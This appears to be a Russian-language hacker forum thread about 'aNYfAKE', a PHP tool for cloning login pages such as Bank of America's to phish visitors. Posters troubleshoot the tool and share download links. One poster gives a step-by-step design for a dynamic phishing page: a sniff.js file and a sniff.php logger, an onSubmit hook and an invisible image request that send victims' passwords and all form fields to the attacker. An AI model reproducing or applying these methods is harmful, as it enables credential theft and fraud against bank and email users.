А что если заставить скрипт при запросе удалённой страницы работать как прокси - отсылать заголовок HTTP_X_FORWARDED_FOR? Будет ли, например тот же самый Mail.RU использовать его?
Да, конечно можно, но: 1) Что это нам реально даст 2) Большое множество всяких погодных ресурсов и тому подоюных, которые выдают контент в соответствии с твоим айпишником не смотрят на этот заголовок Ну если всё-таки есть ещё какая-то причина, то я наверн добавлю =)
ачат фекнулся нормально, а вот это не хочет... желаемый линк - https://www.bankofamerica.com/index.jsp настройки - $fakable_host = 'bankofamerica.com'; // The host where the page is situated $fakable_path = '/'; // The path to a fakeble page $fakable_script = 'index.jsp'; // Page for fake. F.e. "login.php" может изза ССЛ ? или мой серв не хочет конектиццо потому что ему чтото не хватает?
Да, это из-за SSL, потому что я там сокет на 80 порт открываю, а https пашет через 443 кажется. Да и работать с ссл надо по отбельной схеме, если я не ошибаюсь. В общем, посмотрим, если сложным это не окажется, то эту задачу я поставлю в свой список вещей для ДОкодивания =\
2Sadden: 1. там написано должно быть . 2. php код примерно такой: PHP: <?php if (@socket_create()) { echo "Socket does not support!"; } ?>
да ладно... тебе сказать бесплатники, с поддержкой сокетов, без рекламы, с cPanel и кучей других примочек?
поищи в теме про бесплатные хостинги мои посты. Я там по-моему говорил. я не жадный. ниче не скрываю от вас, други мои))
Да простит меня автор). Скриптик жесть....Чисто поржать. Я такую ***ню давно не встречал. Этож как надо пхп испоганить чтобы такое написать =(. Скрипты подобны тем что пишут киберлорды и у зуклон тимы. Вот тут я начал истерично ржать. А если на сайте, данные доступны тока через пост? И еще убила замена через str_replace, тут регулярки нужны а не перечисливать десятки вариаций. Строка убийство. Бугога. Ну тут сделаем вид что все заебись. Конструкцию or die надо 100% юзать, ведь при малейшем глюке, жертва должна видеть ,почему ее пароли не остались у хакера. Конечно, когда не нужны регулярки, их надо юзать. А зачем это в методе GET? Тут вижу целых 2 помарки. "$var" и вторая, это опять что в скрипте есть вывод текста, а хидер не может быть вызван после того как текст отобразился на экране....И тут будет целый камнепад из ошибок скрипта. Мое резюме: Скрипт полностью не пригоден по работе, возможность того что он спалится, работает пиздец как медленно, сделать фейк вручную быстрее чем настроить этот скрипт. Вывод: скрипт надо стереть пока его никто не видел. Ды да. Вот и вся разница между http и https. Для тех кто хочет сделать нормальный фейк, объясняю: Можно сделать два вида фейка, статичный и динамичный. Статичный вы один раз спиздили с сайта html налепили к себе и довольны. Второй динамичный. Каждый раз вы сокетами пиздете html с сайта и изменяет нужные вам данные. Чем плох фейк от бузи кодера, тем что нарушается работа и структура исходного кода. Потом идёт редирект впустую. Смысл нормального фейка ,чтобы минимум произвести изменений в сурсе, абсолютно не нарушая его работы. Чтобы данные отослались сразу куда надо, а не на сниффер. Сделаем это через javascript. Создаем два постоянных файла sniff.js и sniff.php sniff.js // Отсылает даные на снифер sniff.php // Логер Всё, с нашими файлами закончено. Они будут пригодня для всех фейков, так что трогать их не надо. Терь будем изменять сурс фейка. 1) Подключаем наш яваскрипт. 2) Меняем исходные ссылки, на ссылки на фейк 3) На форму добавим обработчик OnSubmit Как только юзер сделает отправку данных, создатся пустой объект картинки(невидимый), при запросе этой картинки, и сработает сниффер, а данные полетят куда им надо, т.е. никакого посредничества и разрыва нету. Всё...фейк готов. Для универсальности, можно в логере, для каждого случая писать новый лог. А в обработчеке форм, пиздить не тока известные поля, а перехватывать содержимое ВСЕХ элементов форумы. Удачи.
не бзди. Ибо тут >> Скрипты подобны тем что пишут киберлорды и у зуклон тимы. пропущен еще и мой ник))
aNYfAKE v.1.1 Как настроить читаем на главной странице либо на скрине Скачать: aNYfAKE_v.1.1.rar | Official Кому жалко меня, мои деньги и мой трафф: aNYfAKE_v.1.1.rar | Rapidshare.com